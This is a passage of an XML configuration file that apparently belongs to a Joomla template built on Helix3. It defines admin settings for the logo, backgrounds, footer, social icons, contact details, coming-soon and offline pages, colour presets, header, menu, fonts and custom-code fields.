				<field name="boxed_background_color" type="colorpicker" default="" class="child boxed_layout boxed_layout_1" label="FLEX_BOXED_LAYOUT_BACKGROUND_COLOR" description="FLEX_BOXED_LAYOUT_BACKGROUND_COLOR_DESC" />
			
                <field type="group" title="HELIX_LOGO" />
                <!-- logo type -->
                <field name="logo_type" class="parent logotype" type="radio" default="image" label="HELIX_LOGO_TYPE" description="HELIX_LOGO_TYPE_DESC">
                    <option value="image">HELIX_LOGO_TYPE_IMAGE</option>
                    <option value="text">HELIX_LOGO_TYPE_TEXT</option>
                </field>
                <field name="logo_position" class="child logotype logotype_image logotype_text" type="modpos" default="logo" label="HELIX_MODULE_POSITIONS" description="HELIX_MODULE_POSITIONS_DESC" />
                <field name="logo_load_pos" class="child logotype logotype_image logotype_text" type="list" default="default" label="HELIX_FEATURE_LOAD_POS" description="HELIX_FEATURE_LOAD_POS_DESC">
                    <option value="default">HELIX_FEATURE_LOAD_POS_DEFAULT</option>
                    <option value="before">HELIX_FEATURE_LOAD_POS_BEFORE</option>
                    <option value="after">HELIX_FEATURE_LOAD_POS_AFTER</option>
                </field>

                <!-- logo image -->
                <field name="logo_image" class="child logotype logotype_image" type="media" preview="true" label="HELIX_LOGO_TYPE_IMAGE" description="HELIX_LOGO_TYPE_IMAGE_DESC" />
                <field name="logo_image_2x" class="child logotype logotype_image" type="media" preview="true" label="HELIX_LOGO_TYPE_IMAGE_RETINA" description="HELIX_LOGO_TYPE_IMAGE_RETINA_DESC" />
                <field name="mobile_logo" type="media" class="child logotype logotype_image" preview="true" label="HELIX_MOBILE_LOGO" description="HELIX_MOBILE_LOGO_DESC" />

                <!-- logo text -->
                <field name="logo_text" class="child logotype logotype_text" type="text" label="HELIX_LOGO_TYPE_TEXT" description="HELIX_LOGO_TYPE_TEXT_DESC" />
                <field name="logo_slogan" class="child logotype logotype_text" type="text" label="HELIX_LOGO_SLOGAN" description="HELIX_LOGO_SLOGAN_DESC" />

                <field type="group" title="HELIX_BODY_BACKGROUND_IMAGE_LABEL" />
                <field name="body_bg_image" type="media" preview="true" label="HELIX_BODY_BACKGROUND_IMAGE" description="HELIX_BODY_BACKGROUND_IMAGE_DESC" />
                <field name="body_bg_repeat" type="list" default="inherit" label="HELIX_BG_REPEAT" description="HELIX_BG_REPEAT_DESC">
                    <option value="no-repeat">HELIX_BG_REPEAT_NO</option>
                    <option value="repeat">HELIX_BG_REPEAT_ALL</option>
                    <option value="repeat-x">HELIX_BG_REPEAT_HORIZ</option>
                    <option value="repeat-y">HELIX_BG_REPEAT_VERTI</option>
                    <option value="inherit">HELIX_BG_REPEAT_INHERIT</option>
                </field>
                <field name="body_bg_size" type="list" default="inherit" label="HELIX_BG_SIZE" description="HELIX_BG_SIZE_DESC">
                    <option value="cover">HELIX_BG_COVER</option>
                    <option value="contain">HELIX_BG_CONTAIN</option>
                    <option value="inherit">HELIX_BG_INHERIT</option>
                </field>
                <field name="body_bg_attachment" type="list" default="inherit" label="HELIX_BG_ATTACHMENT" description="HELIX_BG_ATTACHMENT_DESC">
                    <option value="fixed">HELIX_BG_ATTACHMENT_FIXED</option>
                    <option value="scroll">HELIX_BG_ATTACHMENT_SCROLL</option>
                    <option value="inherit">HELIX_BG_ATTACHMENT_INHERIT</option>
                </field>
                <field name="body_bg_position" type="list" default="0 0" label="HELIX_BG_POSITION" description="HELIX_BG_POSITION_DESC">
                    <option value="0 0">HELIX_BG_POSITION_LEFT_TOP</option>
                    <option value="0 50%">HELIX_BG_POSITION_LEFT_CENTER</option>
                    <option value="0 100%">HELIX_BG_POSITION_LEFT_BOTTOM</option>
                    <option value="50% 0">HELIX_BG_POSITION_CENTER_TOP</option>
                    <option value="50% 50%">HELIX_BG_POSITION_CENTER_CENTER</option>
                    <option value="50% 100%">HELIX_BG_POSITION_CENTER_BOTTOM</option>
                    <option value="100% 0">HELIX_BG_POSITION_RIGHT_TOP</option>
                    <option value="100% 50%">HELIX_BG_POSITION_RIGHT_CENTER</option>
                    <option value="100% 100%">HELIX_BG_POSITION_RIGHT_BOTTOM</option>
                </field>

                <!-- Footer -->
                <field type="group" title="HELIX_FOOTER" />
                <field name="enabled_copyright" type="radio" class="parent copyright" default="1" label="HELIX_COPYRIGHT" description="HELIX_COPYRIGHT_DESC">
                    <option value="1">HELIX_SHOW</option>
                    <option value="0">HELIX_HIDE</option>
                </field>
                <field name="copyright_position" type="modpos" default="footer1" label="HELIX_MODULE_POSITIONS" description="HELIX_MODULE_POSITIONS_DESC" class="child copyright copyright_1" />

                <field name="copyright_load_pos" class="child copyright copyright_1" type="list" default="default" label="HELIX_FEATURE_LOAD_POS" description="HELIX_FEATURE_LOAD_POS_DESC">
                    <option value="default">HELIX_FEATURE_LOAD_POS_DEFAULT</option>
                    <option value="before">HELIX_FEATURE_LOAD_POS_BEFORE</option>
                    <option value="after">HELIX_FEATURE_LOAD_POS_AFTER</option>
                </field>

                <field name="copyright" class="child copyright copyright_1" type="textarea" rows="6" cols="30" default="© {year} Your Company. All Rights Reserved." label="HELIX_COMPYRIGHT_TEXT" description="HELIX_COMPYRIGHT_TEXT_DESC" filter="raw" hint="© {year} Your Company. All Rights Reserved." />

                <!--Social Icons-->
                <field type="group" title="HELIX_SOCIAL_ICONS" />
                <field name="show_social_icons" type="radio" default="1" label="HELIX_SOCIAL_ICONS" description="HELIX_SOCIAL_ICONS_DESC" class="parent social_icons">
                    <option value="1">HELIX_SHOW</option>
                    <option value="0">HELIX_HIDE</option>
                </field>
                <field name="social_position" type="modpos" default="top1" label="HELIX_MODULE_POSITIONS" description="HELIX_MODULE_POSITIONS_DESC" class="child social_icons social_icons_1" />
                <field name="social_load_pos" class="child social_icons social_icons_1" type="list" default="default" label="HELIX_FEATURE_LOAD_POS" description="HELIX_FEATURE_LOAD_POS_DESC">
                    <option value="default">HELIX_FEATURE_LOAD_POS_DEFAULT</option>
                    <option value="before">HELIX_FEATURE_LOAD_POS_BEFORE</option>
                    <option value="after">HELIX_FEATURE_LOAD_POS_AFTER</option>
                </field>
                <field name="facebook" type="text" label="HELIX_SOCIAL_ICON_FACEBOOK" description="HELIX_SOCIAL_ICON_FACEBOOK_DESC" class="child social_icons social_icons_1" />
                <field name="twitter" type="text" label="HELIX_SOCIAL_ICON_TWITTER" description="HELIX_SOCIAL_ICON_TWITTER_DESC" class="child social_icons social_icons_1" />
                <field name="googleplus" type="text" label="HELIX_SOCIAL_ICON_GOOGLEPLUS" description="HELIX_SOCIAL_ICON_GOOGLEPLUS_DESC" class="child social_icons social_icons_1" />
				 <field name="instagram" type="text" label="HELIX_SOCIAL_ICON_INSTAGRAM" description="HELIX_SOCIAL_ICON_INSTAGRAM_DESC" class="child social_icons social_icons_1" />
                <field name="pinterest" type="text" label="HELIX_SOCIAL_ICON_PINTEREST" description="HELIX_SOCIAL_ICON_PINTEREST_DESC" class="child social_icons social_icons_1" />
                <field name="linkedin" type="text" label="HELIX_SOCIAL_ICON_LINKEDIN" description="HELIX_SOCIAL_ICON_LINKEDIN_DESC" class="child social_icons social_icons_1" />
                <field name="dribbble" type="text" label="HELIX_SOCIAL_ICON_DRIBBBLE" description="HELIX_SOCIAL_ICON_DRIBBBLE_DESC" class="child social_icons social_icons_1" />
                <field name="behance" type="text" label="HELIX_SOCIAL_ICON_BEHANCE" description="HELIX_SOCIAL_ICON_BEHANCE_DESC" class="child social_icons social_icons_1" />
                <field name="youtube" type="text" label="HELIX_SOCIAL_ICON_YOUTUBE" description="HELIX_SOCIAL_ICON_YOUTUBE_DESC" class="child social_icons social_icons_1" />
                <field name="flickr" type="text" label="HELIX_SOCIAL_ICON_FLICKR" description="HELIX_SOCIAL_ICON_FLICKR_DESC" class="child social_icons social_icons_1" />
                <field name="skype" type="text" label="HELIX_SOCIAL_ICON_SKYPE" description="HELIX_SOCIAL_ICON_SKYPE_DESC" class="child social_icons social_icons_1" />
				<field name="whatsapp" type="text" label="HELIX_SOCIAL_ICON_WHATSAPP" description="HELIX_SOCIAL_ICON_WHATSAPP_DESC" class="child social_icons social_icons_1" />
                <field name="vk" type="text" label="HELIX_SOCIAL_ICON_VK" description="HELIX_SOCIAL_ICON_VK_DESC" class="child social_icons social_icons_1" />
                <field name="custom" type="text" hint="fa-user http://website.com" label="HELIX_SOCIAL_ICON_CUSTOM" description="HELIX_SOCIAL_ICON_CUSTOM_DESC" class="child social_icons social_icons_1" />

                <!--Contact Info-->
                <field type="group" title="HELIX_CONTACT_INFO" />
                <field name="enable_contactinfo" type="radio" default="1" label="HELIX_ENABLE_CONTACT_INFO" description="HELIX_ENABLE_CONTACT_INFO_DESC" class="parent contactinfo">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="contact_position" type="modpos" default="top2" label="HELIX_MODULE_POSITIONS" description="HELIX_MODULE_POSITIONS_DESC" showon="enable_contactinfo:1" />
	
				<field name="contact_phone" type="text" hint="+228 872 4471" label="HELIX_CONTACT_PHONE" description="HELIX_CONTACT_PHONE_DESC" showon="enable_contactinfo:1" />
				<field name="contact_phone_icon" type="text" label="FLEX_CONTACT_PHONE_ICON" description="FLEX_CONTACT_PHONE_ICON_DESC" showon="enable_contactinfo:1[AND]contact_phone!:" hint="pe pe-7s-headphones" />
				<field type="spacer" name="myspacer1" hr="true" showon="enable_contactinfo:1[AND]contact_phone!:" />
				
				<field name="contact_mobile" type="text" hint="+775 872 1473" label="HELIX_CONTACT_MOBILE" description="HELIX_CONTACT_MOBILE_DESC" showon="enable_contactinfo:1" />
				<field name="contact_mobile_icon" type="text" label="FLEX_CONTACT_MOBILE_ICON" description="FLEX_CONTACT_MOBILE_ICON_DESC" showon="enable_contactinfo:1[AND]contact_mobile!:" hint="pe pe-7s-phone" />
				<field type="spacer" name="myspacer12" hr="true" showon="enable_contactinfo:1[AND]contact_mobile!:" />
				
                <field name="contact_email" type="email" default="" hint="contact@email.com" label="HELIX_CONTACT_EMAIL" description="HELIX_CONTACT_EMAIL_DESC" showon="enable_contactinfo:1" />
				<field name="enable_emailcloaking" type="radio" default="1" label="FLEX_CONTACT_EMAIL_CLOAKING" description="FLEX_CONTACT_EMAIL_CLOAKING_DESC" showon="enable_contactinfo:1[AND]contact_email!:">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<field name="contact_email_icon" type="text" label="FLEX_CONTACT_EMAIL_ICON" description="FLEX_CONTACT_EMAIL_ICON_DESC" showon="enable_contactinfo:1[AND]contact_email!:" hint="pe pe-7s-mail" />
				<field type="spacer" name="myspacer3" hr="true" showon="enable_contactinfo:1[AND]contact_email!:" />
				
                <field name="contact_time" type="text" hint="Mon - Fri 8:00 - 17:30" label="HELIX_CONTACT_OPEN_HOURS" description="HELIX_CONTACT_OPEN_HOURS_DESC" showon="enable_contactinfo:1" />	
				<field name="contact_time_icon" type="text" label="FLEX_CONTACT_OPEN_HOURS_ICON" description="FLEX_CONTACT_OPEN_HOURS_ICON_DESC" showon="enable_contactinfo:1[AND]contact_time!:" hint="pe pe-7s-timer" />
	
				<!--Coming Soon-->
                <field type="group" title="HELIX_COMINGSOON" />
                <field name="comingsoon_mode" type="radio" default="0" label="HELIX_COMINGSOON_MODE" description="HELIX_COMINGSOON_MODE_DESC" class="parent comingsoon">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="comingsoon_title" type="text" default="" label="HELIX_COMINGSOON_TITLE" description="HELIX_COMINGSOON_TITLE_DESC" class="child comingsoon comingsoon_1" hint="Coming Soon" />
                <field name="comingsoon_date" type="calendar" default="5-10-2022" format="%d-%m-%Y" label="HELIX_COMINGSOON_DATE" description="HELIX_COMINGSOON_DATE_DESC" class="child comingsoon comingsoon_1" />
                <field name="comingsoon_content" type="textarea" default="Coming soon content" label="HELIX_COMINGSOON_CONTENT" description="HELIX_COMINGSOON_CONTENT_DESC" filter="raw" class="child comingsoon comingsoon_1" hint="We'll be back in:" />
				<field name="comingsoon_bg_image" type="media" preview="true" label="FLEX_COMINGSOOON_BACKGROUND_IMAGE" description="FLEX_COMINGSOOON_BACKGROUND_IMAGE_DESC" class="child comingsoon comingsoon_1" />
				<field name="comingsoon_logo" type="media" preview="true" label="FLEX_COMINGSOOON_LOGO" description="FLEX_COMINGSOOON_LOGO_DESC" class="child comingsoon comingsoon_1" />

                <!--Error Page-->
                <field type="group" title="FLEX_ERROR_PAGE" />
				<field name="error_bg_image" type="media" preview="true" label="FLEX_ERROR_PAGE_BACKGROUND_IMAGE" description="FLEX_ERROR_PAGE_BACKGROUND_IMAGE_DESC" />
				
				<!--Offline Page-->
                <field type="group" title="FLEX_OFFLINE_PAGE" />
				<field name="offline_bg_image" type="media" preview="true" label="FLEX_OFFLINE_PAGE_BACKGROUND_IMAGE" description="FLEX_OFFLINE_PAGE_BACKGROUND_IMAGE_DESC" />
				<field name="comingsoon_counter" type="radio" default="1" label="HELIX_COMINGSOON_COUNTER" description="HELIX_COMINGSOON_COUNTER_DESC" class="parent offline">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<field name="offline_content" type="textarea" default="" label="HELIX_OFFLINE_CONTENT" description="HELIX_OFFLINE_CONTENT_DESC" filter="raw" class="child offline offline_1" hint="We'll be back in:" />
                <field name="offline_date" type="calendar" default="5-10-2022" format="%d-%m-%Y" label="HELIX_OFFLINE_DATE" description="HELIX_OFFLINE_DATE_DESC" class="child offline offline_1" />
              

            </fieldset>
            <!--End Basic Tab-->

            <fieldset name="preset"  addfieldpath="/plugins/system/helix3/fields">
                <field type="group" title="HELIX_PRESETS" />
                <field name="preset" type="presets"  default="preset1" label="HELIX_PRESETS" />
                
                <field type="group" title="HELIX_STYLING_OPTIONS" />
			
                <!--Start Preset1-->
                <field name="preset1_bg" class="preset-control preset1" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset1_text" class="preset-control preset1" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset1_major" class="preset-control preset1" type="color" default="#f14833" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />

                <!--Start Preset2-->
                <field name="preset2_bg" class="preset-control preset2" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset2_text" class="preset-control preset2" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset2_major" class="preset-control preset2" type="color" default="#fca224" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />

               <!--Start Preset3-->
                <field name="preset3_bg" class="preset-control preset3" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset3_text" class="preset-control preset3" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset3_major" class="preset-control preset3" type="color" default="#f0e95b" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />
				
                <!--Start Preset4-->
                <field name="preset4_bg" class="preset-control preset4" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset4_text" class="preset-control preset4" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset4_major" class="preset-control preset4" type="color" default="#22a9e1" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />
				
                <!--Start Preset5-->
                <field name="preset5_bg" class="preset-control preset5" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset5_text" class="preset-control preset5" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset5_major" class="preset-control preset5" type="color" default="#16b99a" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />
				
                <!--Start Preset6-->
                <field name="preset6_bg" class="preset-control preset6" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset6_text" class="preset-control preset6" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset6_major" class="preset-control preset6" type="color" default="#cc8b60" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />
              
				<!--Start Preset7-->
                <field name="preset7_bg" class="preset-control preset7" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset7_text" class="preset-control preset7" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset7_major" class="preset-control preset7" type="color" default="#7e80e7" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />
				
				<!--Start Preset8-->
                <field name="preset8_bg" class="preset-control preset8" type="colorpicker" default="#ffffff" label="HELIX_BACKGROUND_COLOR" description="HELIX_BACKGROUND_COLOR_DESC" />
                <field name="preset8_text" class="preset-control preset8" type="color" default="#000000" label="HELIX_TEXT_COLOR" description="HELIX_TEXT_COLOR_DESC" />
                <field name="preset8_major" class="preset-control preset8" type="color" default="#999999" label="HELIX_MAJOR_COLOR" description="HELIX_MAJOR_COLOR_DESC" />

            </fieldset>
            <!--End Preset-->
			
			<!--Start Header Tab-->
            <fieldset name="header">
                <field type="group" title="HELIX_HEADER" />
				<!-- Header -->
				<field name="header_height" type="apslide" data-content="data-content" default="90" data-slider-range="40,150" data-slider-step="1" label="FLEX_HEADER_HEIGHT" append="px" description="FLEX_HEADER_HEIGHT_DESC" />
				<field name="headerbg" type="colorpicker" default="" label="FLEX_HEADER_BG_COLOR" description="FLEX_HEADER_BG_COLOR_DESC" />
				<field name="header_link_color" type="color" default="" label="FLEX_HEADER_LINK_COLOR" description="FLEX_HEADER_LINK_COLOR_DESC" />
				<field name="header_active_link_color" type="color" default="" label="FLEX_HEADER_ACTIVE_LINK_COLOR" description="FLEX_HEADER_ACTIVE_LINK_COLOR_DESC" />
				<field name="mega_dropdown_bg" type="colorpicker" default="" label="HELIX_MEGA_MENU_BG_COLOR" description="HELIX_MEGA_MENU_BG_COLOR_DESC" />
                <field name="mega_dropdown_color" type="color" default="" label="HELIX_MEGA_MENU_TEXT_COLOR" description="HELIX_MEGA_MENU_TEXT_COLOR_DESC" />
				
				<field type="group" title="FLEX_STICKY_HEADER" />
				<field name="sticky_header" type="radio" default="1" label="FLEX_STICKY_HEADER_ENABLE" description="FLEX_STICKY_HEADER_ENABLE_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
				<!-- Sticky logo image -->
				<field name="sticky_logo" type="media" preview="true" label="FLEX_STICKY_LOGO" description="FLEX_STICKY_LOGO_DESC" showon="sticky_header:1" />
				
				<field name="sticky_appearance_animation" type="list" default="fade-in-down" label="FLEX_STICKY_HEADER_ANIMATION" description="FLEX_STICKY_HEADER_ANIMATION_DESC" showon="sticky_header:1">
					<option value="none">FLEX_STICKY_HEADER_ANIMATION_NONE</option>
					<option value="simple-fade">FLEX_STICKY_HEADER_ANIMATION_FADE</option>
                    <option value="fade-in-down">FLEX_STICKY_HEADER_ANIMATION_FADE_IN_DOWN</option>
                    <option value="header-in">FLEX_STICKY_HEADER_ANIMATION_HEADER_IN_3D</option>
					<option value="twist">FLEX_STICKY_HEADER_ANIMATION_TWIST</option>
                </field>
				
				<!-- Sticky Header -->
				<field name="sticky_header_height" type="apslide" data-content="data-content" default="70" data-slider-range="40,100" data-slider-step="1" label="FLEX_STICKY_HEADER_HEIGHT" append="px" description="FLEX_STICKY_HEADER_HEIGHT_DESC" showon="sticky_header:1" />
				<field name="stickybg" type="colorpicker" default="" label="FLEX_STICKY_HEADER_BG_COLOR" description="FLEX_STICKY_HEADER_BG_COLOR_DESC" showon="sticky_header:1" />
				<field name="sticky_header_link_color" type="color" default="" label="FLEX_STICKY_HEADER_LINK_COLOR" description="FLEX_STICKY_HEADER_LINK_COLOR_DESC" showon="sticky_header:1" />
				<field name="sticky_header_active_link_color" type="color" default="" label="FLEX_STICKY_HEADER_ACTIVE_LINK_COLOR" description="FLEX_STICKY_HEADER_ACTIVE_LINK_COLOR_DESC" showon="sticky_header:1" />
				<field name="sticky_header_appear_point" type="number" default="250" label="FLEX_STICKY_HEADER_APPEAR_POINT" description="FLEX_STICKY_HEADER_APPEAR_POINT_DESC" min="1" max="1000" step="1" hint="250" showon="sticky_header:1" />
			
			</fieldset>

            <!--Start Layout Tab-->
            <fieldset name="layout" addfieldpath="/plugins/system/helix3/fields">
                <field name="layoutlist" type="layoutlist" />
                <field type="layout" name="layout" />
            </fieldset>
            <!--End Layout Tab-->

            <!--Start Menu Tab-->
            <fieldset name="menu">
                <field type="group" title="HELIX_MEGAMENU" />
                <field name="menu" type="menu" default="mainmenu" label="HELIX_MEGAMENU_SELECT" description="HELIX_MEGAMENU_SELECT_DESC" />
                <field name="menu_type" type="list" default="mega" label="HELIX_MENU_TYPE" description="HELIX_MENU_TYPE_DESC">
                    <option value="mega_offcanvas">HELIX_MEGAMENU_OFFCANVAS</option>
                    <option value="mega">HELIX_MEGAMENU</option>
                    <option value="offcanvas">HELIX_OFFCANVAS</option>
                </field>
				<field 
					name="offcanvas_icon"
					type="radio"
					label="FLEX_OFFCANVAS_ICON"
					description="FLEX_OFFCANVAS_ICON_DESC"
					class="btn-group"
					default="1"
					>
					<option value="1">Font Awesome</option>
					<option value="2">Pixeden</option>
				</field>
				<field type="spacer" name="offcanvas1" hr="true" />
                <field name="dropdown_width" type="number" label="HELIX_MEGAMENU_DROPDOWN_WIDTH" description="HELIX_MEGAMENU_DROPDOWN_WIDTH_DESC" hint="240" />
                <field name="menu_animation" type="list" default="menu-fade-down-fade-up" label="HELIX_MENU_DROPDOWN_ANIMATION" description="HELIX_MENU_DROPDOWN_ANIMATION_DESC">
                    <option value="none">HELIX_NO_ANIMATION</option>
                    <option value="menu-fade">HELIX_FADE_ANIMATION</option>
                    <option value="menu-zoom">HELIX_ZOOM_ANIMATION</option>
                    <option value="menu-fade-up">HELIX_FADE_UP_ANIMATION</option>
					<option value="menu-fade-down-fade-up">HELIX_FADE_DOWN_FADE_UP_ANIMATION</option>
                    <option value="menu-rotate">HELIX_ROTATE_MENU_ANIMATION</option>
                    <option value="menu-slide-down">HELIX_SLIDEDOWN_ANIMATION</option>
                    <option value="menu-drop-in">HELIX_DROPIN_ANIMATION</option>
                    <option value="menu-twist">HELIX_TWIST_ANIMATION</option>
                </field>

                <field name="offcanvas_animation" type="list" default="default" label="HELIX_MENU_OFFCANVAS_ANIMATION" description="HELIX_MENU_OFFCANVAS_ANIMATION_DESC">
                    <option value="default">HELIX_OFFANIMATION_DEFAULT</option>
                    <option value="fullscreen">HELIX_OFFANIMATION_FULLSCREEN</option>
                    <option value="fullScreen-top">HELIX_OFFANIMATION_FULLSCREEN_FROM_TOP</option>
                    <option value="slidetop">HELIX_OFFANIMATION_SLIDE_RIGHT</option>
                    <option value="drarkplus">HELIX_OFFANIMATION_DARK_PLUS</option>
                </field>
				<field name="offcanvas_bg" type="colorpicker" default="" label="FLEX_OFFCANVAS_BG_COLOR" description="FLEX_OFFCANVAS_COLOR_DESC" />
				<field name="offcanvas_color" type="color" default="" label="FLEX_OFFCANVAS_COLOR" description="FLEX_OFFCANVAS_COLOR_DESC" />
            </fieldset>
            <!--End Menu Tab-->

            <!--Start Font Tab-->
            <fieldset name="typography" addfieldpath="/plugins/system/helix3/fields">

				<field type="group" title="HELIX_GOOGLE_FONTS_LIST" subtitle="HELIX_GOOGLE_FONTS_LIST_DESC"/>
                <field name="gfont_api" type="text" class="parent" label="HELIX_GFONT_API" description="HELIX_GFONT_API_DESC" />
                <field name="update_fonts" type="button" url="#" text="HELIX_UPDATE_FONTS_CLICK" label="HELIX_UPDATE_FONTS_LIST" description="HELIX_UPDATE_FONTS_LIST_DESC" class="btn-primary btn-update-fonts-list" />
                
                <field type="group" title="HELIX_BODY_FONT" subtitle="HELIX_BODY_FONT_DESC" />
                <field name="enable_body_font" class="parent body_font" type="radio" default="1" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="body_font" type="typography" class="child body_font body_font_1" default='{"fontFamily":"Open Sans","fontWeight":"300","fontSubset":"latin","fontSize":""}' label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="HEADING1_FONT" subtitle="HEADING1_FONT_DESC" />
                <field name="enable_h1_font" class="parent h1_font" type="radio" default="1" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="h1_font" type="typography" class="child  h1_font h1_font_1" default='{"fontFamily":"Open Sans","fontWeight":"800","fontSubset":"latin","fontSize":""}' label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="HEADING2_FONT" subtitle="HEADING2_FONT_DESC" />
                <field name="enable_h2_font" class="parent h2_font" type="radio" default="1" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="h2_font" type="typography" class="child  h2_font h2_font_1" default='{"fontFamily":"Open Sans","fontWeight":"600","fontSubset":"latin","fontSize":""}' label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="HEADING3_FONT" subtitle="HEADING3_FONT_DESC" />
                <field name="enable_h3_font" class="parent h3_font" type="radio" default="1" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="h3_font" type="typography" class="child  h3_font h3_font_1" default='{"fontFamily":"Open Sans","fontWeight":"regular","fontSubset":"latin","fontSize":""}' label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="HEADING4_FONT" subtitle="HEADING4_FONT_DESC" />
                <field name="enable_h4_font" class="parent h4_font" type="radio" default="1" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="h4_font" type="typography" class="child  h4_font h4_font_1" default='{"fontFamily":"Open Sans","fontWeight":"regular","fontSubset":"latin","fontSize":""}' label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="HEADING5_FONT" subtitle="HEADING5_FONT_DESC" />
                <field name="enable_h5_font" class="parent h5_font" type="radio" default="1" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="h5_font" type="typography" class="child  h5_font h5_font_1" default='{"fontFamily":"Open Sans","fontWeight":"600","fontSubset":"latin","fontSize":""}' label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="HEADING6_FONT" subtitle="HEADING6_FONT_DESC" />
                <field name="enable_h6_font" class="parent h6_font" type="radio" default="1" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="h6_font" type="typography" class="child  h6_font h6_font_1" default='{"fontFamily":"Open Sans","fontWeight":"600","fontSubset":"latin","fontSize":""}' label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="NAVIGATION_FONT" subtitle="NAVIGATION_FONT_DESC" />
                <field name="enable_navigation_font" class="parent navigation_font" type="radio" default="0" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="navigation_font" type="typography" class="child  navigation_font navigation_font_1" label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />

                <field type="group" title="CUSTOM_FONT" subtitle="CUSTOM_FONT_DESC" />
                <field name="enable_custom_font" class="parent custom_font" type="radio" default="0" label="HELIX_ENABLE_FONT" description="HELIX_ENABLE_FONT_DESC">
                    <option value="1">HELIX_YES</option>
                    <option value="0">HELIX_NO</option>
                </field>
                <field name="custom_font" type="typography" class="child  custom_font custom_font_1" label="HELIX_SELECT_FONT" description="HELIX_SELECT_FONT_DESC" />
                <field name="custom_font_selectors" type="textarea" class="child  custom_font custom_font_1" label="HELIX_FONT_CUSTOM_SELECTORS" description="HELIX_FONT_CUSTOM_SELECTORS_DESC" />

            </fieldset>
            <!--End Font Tab-->

            <!--Start Custom Code Tab-->
            <fieldset name="custom_code">
                <field type="group" title="HELIX_CUSTOM_CODE" />
                <field name="before_head" type="textarea" rows="5" label="HELIX_BEFORE_HEAD" description="HELIX_BEFORE_HEAD_DESC" filter="raw" />
                <field name="before_body" type="textarea" rows="5" label="HELIX_BEFORE_BODY" description="HELIX_BEFORE_BODY_DESC" filter="raw" />
                <field name="custom_css" type="textarea" rows="5" label="HELIX_CUSTOM_CSS" description="HELIX_CUSTOM_CSS_DESC" filter="raw" />
